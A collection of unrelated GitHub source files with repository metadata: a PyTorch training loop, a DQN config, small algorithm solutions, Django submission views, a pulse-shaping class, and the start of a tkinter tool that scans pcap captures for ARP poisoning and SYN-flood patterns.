    appends each epoch's validation MAE to results1.txt.
    Relies on module-level D_E, U, DE_optimizer, U_optimizer (CUDA required).
    Dead always-True dd/uu flags and unused locals from the original were
    removed; behavior is otherwise unchanged.
    """
    ma = 0  # MAE of the most recent training batch
    for epoch in range(1, NUM_EPOCHS + 1):
        sum_train_mae = 0
        x = 0  # batches processed this epoch
        # ---------------- training ----------------
        for iter_cnt, (img, img_e, sal_l, sal_e, ed_l, name) in enumerate(train_data):
            D_E.train()
            U.train()
            x = x + 1
            print('training start!!')
            img = Variable(img.cuda())
            img_e = Variable(img_e.cuda())
            sal_l = Variable(sal_l.cuda(), requires_grad=False)
            sal_e = Variable(sal_e.cuda(), requires_grad=False)
            ed_l = Variable(ed_l, requires_grad=False).cuda()
            # --- encoder (D_E) update ---
            f, edges, e_s, e = D_E(img, img_e)
            # Detach the shared features so the decoder step below cannot
            # backpropagate into the encoder.
            ff = [feat.detach() for feat in f[:5]]
            edges_L = cal_eLoss(edges, ed_l)   # edge side-outputs vs. edge GT
            e_s_L = cal_e_mLoss(e_s, sal_l)    # encoder maps vs. saliency GT
            e_L = cal_s_eLoss(e, sal_e)        # predicted edges vs. saliency-edge GT
            DE_optimizer.zero_grad()
            DE_l_1 = 5 * e_s_L + 10 * e_L + 5 * edges_L
            DE_l_1.backward()
            DE_optimizer.step()
            # --- decoder (U) update on detached features ---
            masks, es = U(ff)
            pre_ms_l = 0
            pre_es_l = 0
            ma = torch.abs(sal_l - masks[2]).mean()
            pre_m_l = F.binary_cross_entropy(masks[2], sal_l)
            for i in range(2):
                pre_ms_l += F.binary_cross_entropy(masks[i], sal_l)
                pre_es_l += F.binary_cross_entropy(es[i], sal_e)
            U_l_1 = 50 * pre_m_l + 10 * pre_es_l + pre_ms_l
            U_optimizer.zero_grad()
            U_l_1.backward()
            U_optimizer.step()
            sum_train_mae += float(ma)
            print(
                "Epoch:{}\t iter:{} sum:{} \t mae:{}".format(epoch, x, len(train_data), sum_train_mae / (iter_cnt + 1)))
        # ---------------- checkpointing ----------------
        torch.save(D_E.state_dict(), 'D:\WRM/checkpoints/D_Eepoch%d.pkl' % epoch)
        torch.save(U.state_dict(), 'D:\WRM/checkpoints/Uepoch%d.pkl' % epoch)
        print('model saved')
        # ---------------- validation ----------------
        # NOTE(review): consider wrapping this loop in torch.no_grad() to
        # avoid building graphs during evaluation.
        eval2 = 0
        for iter_cnt, (img, img_e, sal_l, sal_e, ed_l, name) in enumerate(test_data):
            D_E.eval()
            U.eval()
            label_batch = Variable(sal_l).cuda()
            img_eb = Variable(img_e).cuda()
            print('val!!')
            img_batch = Variable(img.cuda())
            f, edges, e_s, e = D_E(img_batch, img_eb)
            masks, es = U(f)
            # Bug fix: `.data[0]` raises IndexError on 0-dim tensors in
            # PyTorch >= 0.4; `.item()` is the supported scalar accessor.
            mae_v2 = torch.abs(label_batch - masks[2]).mean().item()
            eval2 += mae_v2
            m_eval2 = eval2 / (iter_cnt + 1)
            print("test mae", m_eval2)
        with open('results1.txt', 'a+') as results_file:
            results_file.write(str(epoch) + " 2:" + str(m_eval2) + "\n")
# Entry point: run training/evaluation when executed as a script.
if __name__ == '__main__':
    main(train_data,test_data)
16046215665 | # -*- encoding=utf-8 -*-
# Game display constants (RGB colors, pixel sizes).
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
SCREEN_SIZE = [160, 200]
BAR_SIZE = [30, 3]
BALL_SIZE = [9, 9]
# Neural-network outputs: one-hot action encodings.
MOVE_STAY = [1, 0, 0]
MOVE_LEFT = [0, 1, 0]
MOVE_RIGHT = [0, 0, 1]
# learning_rate
LEARNING_RATE = 0.99
# Epsilon-greedy exploration bounds (epsilon anneals from INITIAL to FINAL).
INITIAL_EPSILON = 1.0 # 0.5
FINAL_EPSILON = 0.1 # 0.05
# Step counts: frames to anneal epsilon over, and frames to observe before training.
EXPLORE = 500000 # 500000
OBSERVE = 10000 # 50000
# Replay memory capacity and minibatch size.
REPLAY_MEMORY = 500000 # 500000
BATCH = 32
GAMMA = 0.99 # decay rate of past observations
'''
版本1:
1、初始化replay memory D 容量为N
2、用一个深度神经网络作为Q值网络,初始化权重参数
3、设定游戏片段总数M
4、初始化网络输入,大小为84*84*4,并且计算网络输出
5、以概率ϵ随机选择动作at或者通过网络输出的Q(max)值选择动作at
6、得到执行at后的奖励rt和下一个网络的输入
7、根据当前的值计算下一时刻网络的输出
8、将四个参数作为此刻的状态一起存入到D中(D中存放着N个时刻的状态)
9、随机从D中取出minibatch个状态
10、计算每一个状态的目标值(通过执行at后的reward来更新Q值作为目标值)
11、通过SGD更新weight
下在的是2015年的版本2:
1、初始化replay memory D,容量是N 用于存储训练的样本
2、初始化action-value function的Q卷积神经网络 ,随机初始化权重参数θ
3、初始化 target action-value function的Q^卷积神经网络,结构以及初始化权重θ和Q相同
4、设定游戏片段总数M
5、初始化网络输入,大小为84*84*4,并且计算网络输出
6、根据概率ϵ(很小)选择一个随机的动作或者根据当前的状态输入到当前的网络中 (用了一次CNN)计算出每个动作的Q值,选择Q值最大的一个动作(最优动作)
7、得到执行at后的奖励rt和下一个网络的输入
8、将四个参数作为此刻的状态一起存入到D中(D中存放着N个时刻的状态)
9、随机从D中取出minibatch个状态
10、计算每一个状态的目标值(通过执行at后的reward来更新Q值作为目标值)
11、通过SGD更新weight
12、每C次迭代后更新target action-value function网络的参数为当前action-value function的参数
参考文献:
一个 Q-learning 算法的简明教程
如何用简单例子讲解 Q - learning 的具体过程
《Code for a painless q-learning tutorial》以及百度网盘地址
DQN 从入门到放弃4 动态规划与Q-Learning
DQN从入门到放弃5 深度解读DQN算法
Deep Reinforcement Learning 基础知识(DQN方面)
Paper Reading 1 - Playing Atari with Deep Reinforcement Learning
Playing Atari with Deep Reinforcement Learning 论文及翻译百度网盘地址
Paper Reading 2:Human-level control through deep reinforcement learning
Human-level control through deep reinforcement learning 论文及翻译百度网盘地址
重磅 | 详解深度强化学习,搭建DQN详细指南(附论文)
Playing Atari with Deep Reinforcement Learning算法解读
''' | lichengzhang2005/deeplearning-pygame-dqn | dqn/config.py | config.py | py | 3,218 | python | zh | code | 0 | github-code | 90 |
18513419109 | S = input()
T = input()
# Decide whether T is some rotation of S (read on the previous line).
if len(S) == 1:
    # A single character can only match itself.
    found = S == T
else:
    # Try every right-rotation of S; k = 1 .. len(S) covers all of them,
    # including the identity rotation at k = len(S).
    found = any(S[-k:] + S[:-k] == T for k in range(1, len(S) + 1))
print('Yes' if found else 'No')
18288666919 | import collections, copy
# Read the H x W maze and pad it with a one-cell '#' border so BFS never
# needs bounds checks.
h, w = map(int, input().split())
maze = []
maze.append("#" * (w + 2))
for i in range(h):
    maze.append("#" + input() + "#")
maze.append("#" * (w + 2))
# Distance template: -1 marks unvisited cells; deep-copied per BFS start.
dis = []
for i in range(h + 2):
    temp = [-1] * (w + 2)
    dis.append(temp)
def search(sx, sy):
    """BFS over '.' cells from (sx, sy); return the largest shortest-path distance reached."""
    dist = copy.deepcopy(dis)
    steps = [[-1, 0], [1, 0], [0, 1], [0, -1]]
    frontier = collections.deque([[sx, sy]])
    dist[sx][sy] = 0
    while frontier:
        cx, cy = frontier.popleft()
        for dx, dy in steps:
            nx, ny = cx + dx, cy + dy
            # Only step onto open, not-yet-visited cells.
            if maze[nx][ny] == "." and dist[nx][ny] == -1:
                dist[nx][ny] = dist[cx][cy] + 1
                frontier.append([nx, ny])
    return max(max(dist[r][c] for c in range(w + 2)) for r in range(h + 2))
# The answer is the maze "diameter": the largest BFS eccentricity over all
# open starting cells.
ans = 0
for i in range(h):
    for j in range(w):
        if maze[i + 1][j + 1] == ".":
            dist = search(i + 1, j + 1)
            ans = max(ans, dist)
print(ans)
9114349135 |
from os import walk, system
from pprint import pprint
c2 = input("What to look for ? : ")
# Collect matches as a flat list of alternating [filename, matching line, ...].
matches = []
for root, _dirs, files in walk("src/"):
    for fname in files:
        if fname.endswith(".java"):
            with open(root + "/" + fname, "r") as handle:
                for text in handle.readlines():
                    if c2 in text:
                        matches.append(fname)
                        matches.append(text.replace("\t", "").replace("\n", ""))
pprint(matches)
system("pause")
| AtomicMaya/BikeGame | test.py | test.py | py | 415 | python | en | code | 0 | github-code | 90 |
70591427497 | from abc import ABC, abstractmethod
from typing import Tuple
import numpy as np
import scipy.integrate
class Pulse(ABC):
    """Abstract base for pulse generators defined by baud rate and sampling grid."""

    def __init__(
        self,
        baud_rate: float = 10e9,
        num_symbols: float = 1e3,
        samples_per_symbol: float = 2**5,
    ):
        self.baud_rate = baud_rate
        self.num_symbols = num_symbols
        self.samples_per_symbol = samples_per_symbol
        # Symbol period (seconds).
        self.T0 = 1 / self.baud_rate

    @abstractmethod
    def data(self) -> Tuple[np.ndarray, np.ndarray]:
        """Return the pulse shape and the time axis."""
        pass
class RaisedCosinePulse(Pulse):
    """Raised-cosine pulse built in the frequency domain and unit-energy normalized."""

    def __init__(
        self,
        baud_rate: float = 10e9,
        num_symbols: float = 1e3,
        samples_per_symbol: float = 2**5,
        rolloff: float = 0.1,
    ):
        super().__init__(baud_rate, num_symbols, samples_per_symbol)
        # Roll-off factor of the raised-cosine spectrum.
        # NOTE(review): rolloff == 0 would divide by zero in _generate.
        self.rolloff = rolloff
        self._generate()

    def data(self) -> Tuple[np.ndarray, np.ndarray]:
        """Return (pulse samples, time axis) precomputed by _generate."""
        return self.g, self.t

    def _generate(self):
        """Build the raised-cosine spectrum, transform to time, normalize to unit energy."""
        dt = self.T0 / self.samples_per_symbol
        Ndt = self.samples_per_symbol * self.num_symbols
        # Symmetric time axis centered on zero.
        t = np.arange(-Ndt / 2, Ndt / 2) * dt
        df = 1 / (max(t) - min(t))
        dw = 2 * np.pi * df
        f = np.arange(-Ndt / 2, Ndt / 2) * df
        rof = self.rolloff
        R = rof
        rate = 1 / self.T0
        freq = f
        # wind selects the transition band [(1-R)/2, (1+R)/2] * rate where
        # the cosine taper applies; outside it the spectrum is flat or zero.
        wind1 = np.zeros_like(f)
        wind1[np.abs(freq) <= rate * (1 + R) / 2] = 1
        wind2 = np.zeros_like(f)
        wind2[np.abs(freq) >= rate * (1 - R) / 2] = 1
        wind = wind1 * wind2
        # wind1[np.abs(freq) >= R * (1 - R) / 2] = 1
        gf = (1 - wind) + wind * 0.5 * (
            1 + np.cos(np.pi / R / rate * (np.abs(freq) - rate * (1 - R) / 2))
        )
        # Zero out everything beyond the outer band edge.
        gf[np.abs(freq) > rate * (1 + R) / 2] = 0
        gt = np.real(np.fft.ifftshift(np.fft.ifft(np.fft.fftshift(gf))))
        # Normalize so that integral of |g(t)|^2 dt == 1.
        energy = scipy.integrate.trapezoid(np.abs(gt) ** 2, t)
        gt = gt / np.sqrt(energy)
        self.t = t
        self.g = gt
| geeanlooca/PyNLIN | pynlin/pulses.py | pulses.py | py | 2,021 | python | en | code | 3 | github-code | 90 |
13064565866 | from datetime import datetime
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.template.defaultfilters import slugify
from wagtail.admin.utils import send_notification
from .forms import BlogForm, CaseStudyForm, FlowJSONFileForm, ImageForm, MarketplaceEntryForm
from .models import (
BlogPageTag,
Country,
CountryCaseStudy,
CountryMarketplaceEntry,
Expertise,
ExpertiseMarketplaceEntry,
FocusArea,
FocusAreaCaseStudy,
MarketplaceIndexPage,
Organization,
OrganizationCaseStudy,
Region,
RegionCaseStudy,
RegionMarketplaceEntry,
Service,
ServiceMarketplaceEntry,
Tag,
)
def submit_marketplace_entry(request, marketplace_index):
    """Handle the public marketplace-entry submission form.

    On valid POST: creates an unpublished child page under marketplace_index,
    attaches the optional logo, links selected/additional services, expertise,
    regions and countries, submits the page for moderation, and redirects to
    the 'thanks' subpage. Otherwise renders the (re-)display of the form.
    """
    form = MarketplaceEntryForm(data=request.POST or None, label_suffix='')
    # If the user uploaded a logo we want the logo_form to validate it is a
    # valid image, but if no logo file was uploaded then proceed with an
    # unbound ImageForm. This avoids re-display due to errors in the main form
    # erroneously telling the user that the logo file is required (it is required
    # for that form, but the entire form is optional).
    if request.FILES:
        logo_form = ImageForm(data=request.POST, files=request.FILES, label_suffix='')
        logo_form_valid = logo_form.is_valid()
    else:
        logo_form = ImageForm(label_suffix='')
        logo_form_valid = True
    if request.method == 'POST' and form.is_valid() and logo_form_valid:
        marketplace_entry_page = form.save(commit=False)
        marketplace_entry_page.slug = slugify(marketplace_entry_page.title)
        marketplace_entry = marketplace_index.add_child(instance=marketplace_entry_page)
        if marketplace_entry:
            # Keep the new page hidden until a moderator approves it.
            marketplace_entry.unpublish()
            if request.FILES:
                logo_image = logo_form.save(commit=False)
                logo_image.title = "Logo for %s" % marketplace_entry_page.title
                logo_image.save()
                marketplace_entry.logo_image = logo_image
            # Link checkbox selections, then any free-text "additional"
            # entries (comma-separated, created on the fly).
            for service in request.POST.getlist('services'):
                ServiceMarketplaceEntry.objects.create(
                    service=Service.objects.get(id=service),
                    page=marketplace_entry
                )
            if request.POST.get('services_additional'):
                for service_name in request.POST.get('services_additional').split(","):
                    service_name = service_name.lstrip().rstrip().capitalize()
                    service, created = Service.objects.get_or_create(name=service_name)
                    ServiceMarketplaceEntry.objects.create(
                        service=service,
                        page=marketplace_entry
                    )
            for expertise in request.POST.getlist('expertise'):
                ExpertiseMarketplaceEntry.objects.create(
                    expertise=Expertise.objects.get(id=expertise),
                    page=marketplace_entry
                )
            if request.POST.get('expertise_additional'):
                for expertise_name in request.POST.get('expertise_additional').split(","):
                    expertise_name = expertise_name.lstrip().rstrip().capitalize()
                    expertise, created = Expertise.objects.get_or_create(name=expertise_name)
                    ExpertiseMarketplaceEntry.objects.create(
                        expertise=expertise,
                        page=marketplace_entry
                    )
            for region in request.POST.getlist('regions_experience'):
                RegionMarketplaceEntry.objects.create(
                    region=Region.objects.get(id=region),
                    page=marketplace_entry
                )
            for country in request.POST.getlist('countries_experience'):
                CountryMarketplaceEntry.objects.create(
                    country=Country.objects.get(id=country),
                    page=marketplace_entry
                )
            # Submit page for moderation. This requires first saving a revision.
            marketplace_entry.save_revision(submitted_for_moderation=True)
            # Then send the notification. Last param None means do not exclude any
            # moderators from email (internally wagtail would exclude the user
            # submitting from such emails, be we are submitting something from an
            # anonymous user, so no one should be excluded from the email).
            send_notification(marketplace_entry.get_latest_revision().id, 'submitted', None)
        return HttpResponseRedirect(marketplace_index.url + marketplace_index.reverse_subpage('thanks'))
    services = Service.objects.order_by('name')
    expertise_list = Expertise.objects.order_by('name')
    countries = Country.objects.order_by('name')
    regions = Region.objects.order_by('name')
    # Offer the last 100 years as "year established" choices.
    base_year = datetime.today().year
    years = [base_year - x for x in range(0, 100)]
    context = {
        'form': form,
        'logo_form': logo_form,
        'services': services,
        'years': years,
        'expertise_list': expertise_list,
        'countries': countries,
        'regions': regions,
        'marketplace_index': marketplace_index,
    }
    return render(request, 'portal_pages/marketplace_entry_page_add.html', context)
def submit_blog(request, blog_index):
    """Handle the public blog submission form.

    On valid POST: creates an unpublished child page under blog_index, links
    selected and free-text tags, submits for moderation, and redirects to the
    'thanks' subpage. Otherwise renders the form.
    """
    form = BlogForm(data=request.POST or None, label_suffix='')
    if request.method == 'POST' and form.is_valid():
        blog_page = form.save(commit=False)
        blog_page.slug = slugify(blog_page.title)
        blog = blog_index.add_child(instance=blog_page)
        if blog:
            # Keep hidden until a moderator approves it.
            blog.unpublish()
            for tag in request.POST.getlist('tags'):
                BlogPageTag.objects.create(tag=Tag.objects.get(id=tag),
                                           content_object=blog)
            # Free-text tags are comma-separated and created on the fly.
            if request.POST.get('tags_additional'):
                for tag_name in request.POST.get('tags_additional').split(","):
                    tag_name = tag_name.lstrip().rstrip()
                    tag, created = Tag.objects.get_or_create(name=tag_name)
                    BlogPageTag.objects.create(
                        tag=tag,
                        content_object=blog
                    )
            # Submit page for moderation. This requires first saving a revision.
            blog.save_revision(submitted_for_moderation=True)
            # Then send the notification. Last param None means do not exclude any
            # moderators from email (internally wagtail would exclude the user
            # submitting from such emails, be we are submitting something from an
            # anonymous user, so no one should be excluded from the email).
            send_notification(blog.get_latest_revision().id, 'submitted', None)
        return HttpResponseRedirect(blog_index.url + blog_index.reverse_subpage('thanks'))
    # Only offer tags that are already used on at least one blog page.
    tags = Tag.objects.filter(portal_pages_blogpagetag_items__isnull=False).order_by('name').distinct('name')
    context = {
        'form': form,
        'tags': tags,
        'blog_index': blog_index,
    }
    return render(request, 'portal_pages/blog_page_add.html', context)
def submit_case_study(request, case_study_index):
    """Handle the public case-study submission form.

    On valid POST: creates an unpublished child page under case_study_index,
    attaches the optional flow document, links focus areas, organizations,
    regions and countries (including free-text additions), submits for
    moderation, and redirects to the 'thanks' subpage. Otherwise renders
    the form.
    """
    form = CaseStudyForm(data=request.POST or None, label_suffix='')
    # If the user uploaded a flow document we want the flow_json_file_form to validate it is a
    # valid document, but if no file was uploaded then proceed with an
    # unbound FlowJSONFileForm. This avoids re-display due to errors in the main form
    # erroneously telling the user that the flow file is required (it is required
    # for that form, but the entire form is optional).
    if request.FILES:
        flow_json_file_form = FlowJSONFileForm(data=request.POST, files=request.FILES, label_suffix='')
        flow_json_file_form_valid = flow_json_file_form.is_valid()
    else:
        flow_json_file_form = FlowJSONFileForm(label_suffix='')
        flow_json_file_form_valid = True
    if request.method == 'POST' and form.is_valid() and flow_json_file_form_valid:
        case_study_page = form.save(commit=False)
        # Month/year selectors are combined into a first-of-month date.
        if request.POST.get('year_start') and request.POST.get('month_start'):
            full_date = request.POST.get('year_start') + '-' + request.POST.get('month_start') + '-01'
            case_study_page.date = datetime.strptime(full_date, '%Y-%m-%d').date()
        case_study_page.slug = slugify(case_study_page.title)
        case_study = case_study_index.add_child(instance=case_study_page)
        if case_study:
            # Keep hidden until a moderator approves it.
            case_study.unpublish()
            if request.FILES:
                downloadable_package = flow_json_file_form.save(commit=False)
                downloadable_package.title = "Document for %s" % case_study_page.title
                downloadable_package.save()
                case_study.downloadable_package = downloadable_package
            # Link checkbox selections, then any free-text "additional"
            # entries (comma-separated, created on the fly).
            for focus_area in request.POST.getlist('focus_areas'):
                FocusAreaCaseStudy.objects.create(
                    focusarea=FocusArea.objects.get(id=focus_area),
                    page=case_study
                )
            if request.POST.get('focus_areas_additional'):
                for focus_area_name in request.POST.get('focus_areas_additional').split(","):
                    focus_area_name = focus_area_name.lstrip().rstrip().capitalize()
                    focus_area, created = FocusArea.objects.get_or_create(name=focus_area_name)
                    FocusAreaCaseStudy.objects.create(
                        focusarea=focus_area,
                        page=case_study
                    )
            for organization in request.POST.getlist('organizations'):
                OrganizationCaseStudy.objects.create(
                    organization=Organization.objects.get(id=organization),
                    page=case_study
                )
            if request.POST.get('organizations_additional'):
                for organization_name in request.POST.get('organizations_additional').split(","):
                    organization_name = organization_name.lstrip().rstrip().capitalize()
                    organization, created = Organization.objects.get_or_create(name=organization_name)
                    OrganizationCaseStudy.objects.create(
                        organization=organization,
                        page=case_study
                    )
            for region in request.POST.getlist('regions'):
                RegionCaseStudy.objects.create(
                    region=Region.objects.get(id=region),
                    page=case_study
                )
            for country in request.POST.getlist('countries'):
                CountryCaseStudy.objects.create(
                    country=Country.objects.get(id=country),
                    page=case_study
                )
            # Submit page for moderation. This requires first saving a revision.
            case_study.save_revision(submitted_for_moderation=True)
            # Then send the notification. Last param None means do not exclude any
            # moderators from email (internally wagtail would exclude the user
            # submitting from such emails, be we are submitting something from an
            # anonymous user, so no one should be excluded from the email).
            send_notification(case_study.get_latest_revision().id, 'submitted', None)
        return HttpResponseRedirect(case_study_index.url + case_study_index.reverse_subpage('thanks'))
    focus_areas = FocusArea.objects.order_by('name')
    organizations = Organization.objects.order_by('name')
    countries = Country.objects.order_by('name')
    regions = Region.objects.order_by('name')
    # Offer the last 100 years and zero-padded month numbers as choices.
    base_year = datetime.today().year
    years = [base_year - x for x in range(0, 100)]
    months = ['January', 'February', 'March', 'April',
              'May', 'June', 'July', 'August',
              'September', 'October', 'November', 'December']
    months = [('%02d' % x, y) for x, y in list(enumerate(months, 1))]  # months = [('01', 'Jan'), ('02', 'Feb')], ...
    marketplace_index = MarketplaceIndexPage.objects.live()[0]
    context = {
        'form': form,
        'flow_json_file_form': flow_json_file_form,
        'focus_areas': focus_areas,
        'organizations': organizations,
        'years': years,
        'months': months,
        'countries': countries,
        'regions': regions,
        'case_study_index': case_study_index,
        'marketplace_index': marketplace_index,
    }
    return render(request, 'portal_pages/case_study_page_add.html', context)
| rapidpro/rapidpro-community-portal | src/rapidpro_community_portal/apps/portal_pages/views.py | views.py | py | 12,665 | python | en | code | 18 | github-code | 90 |
22814088730 | #########################################################################################################################################
#imports
from tkinter import filedialog
from tkinter import *
from tkinter import messagebox
import tkintermapview
from PIL import ImageTk, Image
import customtkinter
import os
from scapy import *
from scapy.utils import RawPcapReader
from scapy.layers.l2 import Ether, ARP
from scapy.layers.inet import IP, TCP
import time
from datetime import datetime, timezone
import requests
#########################################################################################################################################
# Global customtkinter appearance settings (applied before any widget is built).
customtkinter.set_appearance_mode("Dark") # Modes: "System" (standard), "Dark", "Light"
customtkinter.set_default_color_theme("blue") # Themes: "blue" (standard), "green", "dark-blue"
#########################################################################################################################################
#paths + images
# Resolve asset directories relative to this script so the app runs from any cwd.
image_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "images")
pcap_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "pcaps")
# Pre-load all icons/images used by the GUI (CTkImage handles scaling).
network_home_image = customtkinter.CTkImage(Image.open(os.path.join(image_path, "network3.png")), size=(612, 181))
attack_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "attack_symbol.png")), size=(50, 50))
home_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "home_symbol.png")), size=(40, 40))
prep_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "prep_symbol.png")), size=(40, 40))
analysis_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "analysis_symbol.png")), size=(40, 40))
map_symbol = customtkinter.CTkImage(Image.open(os.path.join(image_path, "map.png")), size=(40, 40))
#########################################################################################################################################
#get ip geolocation data
def get_location(ip):
    """Geolocate an IP address via the ipapi.co JSON service.

    Returns a (latitude, longitude) pair; either value may be None when the
    service has no geolocation data for the address (the caller's marker
    code handles that by catching the resulting error).

    Raises whatever `requests` raises on network failure/timeout, exactly as
    the original did on an unreachable network.
    """
    # why: without a timeout a slow/unreachable geolocation service would
    # block the Tk event loop indefinitely.
    response = requests.get(f'https://ipapi.co/{ip}/json/', timeout=10).json()
    # The previous version built a full location_data dict but only ever used
    # these two fields, so return them directly.
    return response.get("latitude"), response.get("longitude")
#########################################################################################################################################
#convert epoch to localtime
def timestamp(ts_epoch):
    """Convert an epoch time (seconds) to a local 'YYYY-MM-DD HH:MM:SS' string."""
    local_dt = datetime.fromtimestamp(ts_epoch)
    return local_dt.strftime('%Y-%m-%d %H:%M:%S')
#########################################################################################################################################
#process / analyse pcap file for ARP Poisoning Attack
def process_pcap_arp(file_name):
    """Scan a pcap (in `pcap_path`) for ARP poisoning.

    An ARP packet whose sender MAC does not match the known IP->MAC table
    `net` is flagged as poisoning.  Returns
    (packet_number, attack, src_text, smac_text, dst_text, dmac_text,
     timestamp, detection) — strings ready for the analysis-tab labels.
    """
    # Ground-truth ip -> mac mapping of the machines on the simulated network.
    net = {"192.168.100.2":"54:52:00:12:35:00","192.168.100.8":"08:00:27:72:e3:c1","192.168.100.3":"08:00:27:73:8e:fa","192.168.100.5":"08:00:27:ad:fc:da"}
    #net = {"192.168.1.1":"08:00:27:5e:01:7c","192.168.1.104":"08:00:27:b8:b7:58","192.168.1.105":"08:00:27:2d:f8:5a"}
    #evaluation table - activate when using the public arp pcap - eval-arp
    print('Analysing {}...'.format(file_name))
    count = 0            # packets seen
    arp_pkt_counter = 0  # ARP packets seen
    attack = False
    # Bug fix: give `detection` (and the display fields) defaults so a capture
    # containing no ARP traffic cannot raise UnboundLocalError at the return.
    detection = "No ARP Packets Found"
    first_pkt_timestamp = None
    pkt_number = None
    first_pkt_src = None
    first_pkt_smac = None
    first_pkt_dst = None
    first_pkt_dmac = None
    truefileloc = os.path.join(pcap_path, file_name)  # absolute path: works from any cwd
    for (pkt_data, pkt_metadata) in RawPcapReader(truefileloc):
        count += 1
        ether_pkt = Ether(pkt_data)
        if 'type' not in ether_pkt.fields:
            continue  # disregard LLC frames
        if ether_pkt.type != 0x0806:
            continue  # disregard non-ARP packets
        arp_pkt = ether_pkt[ARP]
        arp_pkt_counter += 1
        if arp_pkt_counter == 1:
            # Remember the first ARP packet so something sensible is shown
            # when no poisoning is found.
            detection = "No ARP Poisoning Detected\nDisplaying First ARP Data"
            first_pkt_timestamp = timestamp(pkt_metadata.sec)
            pkt_number = count
            first_pkt_src = ("Source IP: "+str(arp_pkt.psrc))
            first_pkt_smac = ("Source MAC: "+str(arp_pkt.hwsrc))
            first_pkt_dst = ("Destination IP: "+str(arp_pkt.pdst))
            first_pkt_dmac = ("Destination MAC: "+str(arp_pkt.hwdst))
        try:
            if net[arp_pkt.psrc] != arp_pkt.hwsrc:
                # Bug fix: resolve the attacker's true IP *before* mutating the
                # display fields, so a MAC absent from `net` cannot leave the
                # function in a half-updated state when the lookup fails.
                key = [k for k, v in net.items() if v == arp_pkt.hwsrc][0]
                detection = " ARP Poisoning Detected "
                first_pkt_timestamp = timestamp(pkt_metadata.sec)
                pkt_number = count
                first_pkt_src = ("Attacker IP: "+str(key))
                first_pkt_smac = ("Attack MAC: "+str(arp_pkt.hwsrc))
                first_pkt_dst = ("Target IP: "+str(arp_pkt.pdst))
                first_pkt_dmac = ("Target MAC: "+str(arp_pkt.hwdst))
                attack = True
                break  # attack found: stop scanning to save resources
        except (KeyError, IndexError):
            # Narrowed from a bare `except`: only "address not in the
            # ground-truth table" is tolerated; other errors now surface.
            print("IP Unknown")
    return pkt_number, attack, first_pkt_src, first_pkt_smac, first_pkt_dst, first_pkt_dmac, first_pkt_timestamp, detection
#########################################################################################################################################
#process / analyse pcap file for SYN Attack
def process_pcap_syn(file_name):
    """Scan a pcap (in `pcap_path`) for a SYN-flood pattern.

    Three or more consecutive TCP packets with only the SYN flag set are
    treated as an attack.  Returns
    (packet_number, attack, "ip:port" src, "ip:port" dest, timestamp,
     protocol, detection) ready for the analysis-tab labels; when no attack
    is found the first IPv4 packet's data is returned instead.
    """
    print('Analysing {}...'.format(file_name))
    count = 0              # packets seen
    ipv4_packet_count = 0  # IPv4 packets seen
    syn = 0                # consecutive-SYN run length
    attack = False
    first_atkpkt_no = None
    first_atkpkt_timestamp = None
    first_atkpkt_src = None
    first_atkpkt_sport = None
    first_atkpkt_dst = None
    first_atkpkt_dport = None
    first_atkpkt_protocol = None
    first_pkt_timestamp = None
    first_pkt_src = None
    first_pkt_sport = None
    first_pkt_dst = None
    first_pkt_dport = None
    first_pkt_protocol = None
    truefileloc = os.path.join(pcap_path, file_name)  # absolute path: works from any cwd
    for (pkt_data, pkt_metadata) in RawPcapReader(truefileloc):
        count += 1
        ether_pkt = Ether(pkt_data)
        if 'type' not in ether_pkt.fields:
            continue  # disregard LLC frames
        if ether_pkt.type != 0x0800:
            continue  # disregard non-IPv4 packets
        ip_pkt = ether_pkt[IP]
        ipv4_packet_count += 1
        if ipv4_packet_count == 1:
            # Remember the first IPv4 packet for the no-attack display.
            first_pkt_timestamp = timestamp(pkt_metadata.sec)
            first_pkt_src = ip_pkt.src
            first_pkt_dst = ip_pkt.dst
            # Bug fix: read the payload class name directly instead of the
            # fragile strip()/lstrip() character-set parsing of
            # str(<class 'scapy...'>), which was also duplicated with two
            # different strip sets below.
            first_pkt_protocol = ip_pkt.layers()[1].__name__
        if ip_pkt.proto != 6:
            continue  # disregard non-TCP packets
        tcp_pkt = ip_pkt[TCP]
        if ipv4_packet_count == 1:
            first_pkt_sport = tcp_pkt.sport
            first_pkt_dport = tcp_pkt.dport
        if str(tcp_pkt.flags) == 'S':
            syn += 1  # extend the consecutive-SYN run
        else:
            syn = 0   # run broken: reset
        if syn == 1:
            # Start of a possible attack: record this packet's details.
            first_atkpkt_no = count
            first_atkpkt_timestamp = timestamp(pkt_metadata.sec)
            first_atkpkt_src = ip_pkt.src
            first_atkpkt_sport = tcp_pkt.sport
            first_atkpkt_dst = ip_pkt.dst
            first_atkpkt_dport = tcp_pkt.dport
            first_atkpkt_protocol = ip_pkt.layers()[1].__name__
        if syn > 2:
            attack = True
            break  # attack found: stop scanning to save resources
    if attack:
        detection = "SYN Attack Detected"
        src = str(first_atkpkt_src)+':'+str(first_atkpkt_sport)
        dest = str(first_atkpkt_dst)+':'+str(first_atkpkt_dport)
        return first_atkpkt_no, attack, src, dest, first_atkpkt_timestamp, first_atkpkt_protocol, detection
    detection = "No SYN Attack Detected"
    if first_pkt_sport is not None:  # port data available: show ip:port
        src = str(first_pkt_src)+':'+str(first_pkt_sport)
        dest = str(first_pkt_dst)+':'+str(first_pkt_dport)
    else:                            # no TCP seen: show ip only
        src = str(first_pkt_src)+' '
        dest = str(first_pkt_dst)+' '
    return count, attack, src, dest, first_pkt_timestamp, first_pkt_protocol, detection
#########################################################################################################################################
#changeframe function #1 - main frames
def changeframe(frame):
    """Bring the given frame to the top of the window's stacking order."""
    frame.tkraise()
#########################################################################################################################################
#changeframe function #2 - side frames
def changeframetest(frame):
    """Show the named side frame in the content area and hide the other three.

    An unknown name hides all four frames (same as the original behaviour).
    """
    side_frames = (
        ("home", home_frame),
        ("prep", prep_frame),
        ("analysis", analysis_frame),
        ("map", map_frame),
    )
    for name, side_frame in side_frames:
        if name == frame:
            side_frame.grid(column=1, row=0, sticky="nesw")
        else:
            side_frame.grid_forget()
#########################################################################################################################################
#import folder function / storage + attack selection storage
def importfolder():
    """Open a file chooser, reduce the selected path to the pcap's file name,
